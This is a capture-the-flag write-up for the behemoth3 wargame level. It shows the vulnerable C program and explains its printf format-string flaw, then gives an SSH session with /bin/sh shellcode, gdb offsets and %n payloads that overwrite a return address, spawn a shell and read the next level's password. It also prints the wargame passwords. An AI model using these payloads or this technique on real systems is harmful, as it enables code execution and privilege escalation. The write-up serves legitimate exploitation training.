#include <stdio.h>
/*
 * behemoth3 target: prompt for a line on stdin and echo it back.
 *
 * The echo passes the attacker-controlled buffer to printf() as the
 * FORMAT STRING, not as data.  Conversions in the input are then
 * interpreted: %x/%d leak stack words, and %n stores the number of
 * characters printed so far through a pointer taken from printf's
 * argument slots.  Those slots are main's outgoing-argument area, and
 * buf lives there too (0x18(%esp), the 6th 4-byte slot above the
 * format), so the first four bytes of the input can name an arbitrary
 * write target -- that is what the "%6$n" payloads in the session
 * below rely on.
 *
 * Correct form: printf("%s", buf) or fputs(buf, stdout).  The source is
 * left unfixed here because the disassembly and stack offsets later on
 * the page describe exactly this binary.
 */
int main(int argc, char *argv[])
{
char buf[200];
printf("Identify yourself: ");
fgets(buf, 200, stdin);   /* bounded read: at most 199 bytes plus NUL -- no overflow here */
printf("Welcome, ");
printf(buf);              /* VULNERABLE: user input used as the format string */
puts("\naaaand goodbye again.");
return 0;
}
root@today:~# ssh behemoth3@178.79.134.250
behemoth3@178.79.134.250's password: nieteidiel
behemoth3@melinda:~$ cd /behemoth
behemoth3@melinda:/behemoth$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')
behemoth3@melinda:/behemoth$ /tmp/shui3/env EGG ./behemoth3
0xffffd8ab
behemoth3@melinda:/behemoth$ gdb -tui behemoth3
(gdb) b main
(gdb) layout asm
(gdb) run
(gdb) i r esp
esp 0xffffd5b8 0xffffd5b8
(gdb)
behemoth3@melinda:/behemoth$ # %6$n: buf is at 0x18(%esp), i.e. printf's 6th 4-byte argument slot, so the first 4 input bytes become the %n target; the "200" is the %10d of the stale fgets size argument (0xc8) apparently still sitting at 4(%esp)
behemoth3@melinda:/behemoth$ (python -c 'print "\xbc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3
Identify yourself: Welcome, ����       200
aaaand goodbye again.
behemoth3@melinda:/behemoth$ (python -c 'print "\xcc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3
Identify yourself: Welcome, ����       200
aaaand goodbye again.
behemoth3@melinda:/behemoth$ (python -c 'print "\xdc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3
Identify yourself: Welcome, ����       200
aaaand goodbye again.
Segmentation fault
behemoth3@melinda:/behemoth$ # two-stage write of the EGG address 0xffffd8ab into 0xffffd5dc: 8 address bytes + 55459 pad = 55467 = 0xd8ab, stored by %6$n at 0xffffd5dc; + 10068 more = 65535 = 0xffff, stored by %7$n at 0xffffd5de (its upper two zero bytes spill into 0xffffd5e0-e1). The trailing cat keeps stdin open so the spawned shell reads the commands that follow.
behemoth3@melinda:/behemoth$ (python -c 'print "\xdc\xd5\xff\xff\xde\xd5\xff\xff" + "%55459x%6$n%10068x%7$n"' ; cat) | ./behemoth3
Identify yourself: Welcome, �������� c8 f7fcbc20   (the tens of thousands of padding spaces from %55459x/%10068x are collapsed in this transcript; c8 is the stale fgets size argument, f7fcbc20 the stale stdin pointer from 8(%esp))
aaaand goodbye again.
whoami
behemoth4
cat /etc/behemoth_pass/behemoth4
ietheishei
^C
┌─────────────────────────────────────────────────────────────────────────────────┐
│0x804847d <main> push %ebp │
│0x804847e <main+1> mov %esp,%ebp │
│0x8048480 <main+3> and $0xfffffff0,%esp │
│0x8048483 <main+6> sub $0xe0,%esp │
│0x8048489 <main+12> movl $0x8048570,(%esp) │
│0x8048490 <main+19> call 0x8048330 <printf@plt> │
│0x8048495 <main+24> mov 0x80497a4,%eax │
│0x804849a <main+29> mov %eax,0x8(%esp) │
│0x804849e <main+33> movl $0xc8,0x4(%esp) │
│0x80484a6 <main+41> lea 0x18(%esp),%eax │
│0x80484aa <main+45> mov %eax,(%esp) │
│0x80484ad <main+48> call 0x8048340 <fgets@plt> │
│0x80484b2 <main+53> movl $0x8048584,(%esp) │
│0x80484b9 <main+60> call 0x8048330 <printf@plt> │
│0x80484be <main+65> lea 0x18(%esp),%eax │
│0x80484c2 <main+69> mov %eax,(%esp) │
│0x80484c5 <main+72> call 0x8048330 <printf@plt> │
│0x80484ca <main+77> movl $0x804858e,(%esp) │
│0x80484d1 <main+84> call 0x8048350 <puts@plt> │
│0x80484d6 <main+89> mov $0x0,%eax │
│0x80484db <main+94> leave │
│0x80484dc <main+95> ret │
└─────────────────────────────────────────────────────────────────────────────────┘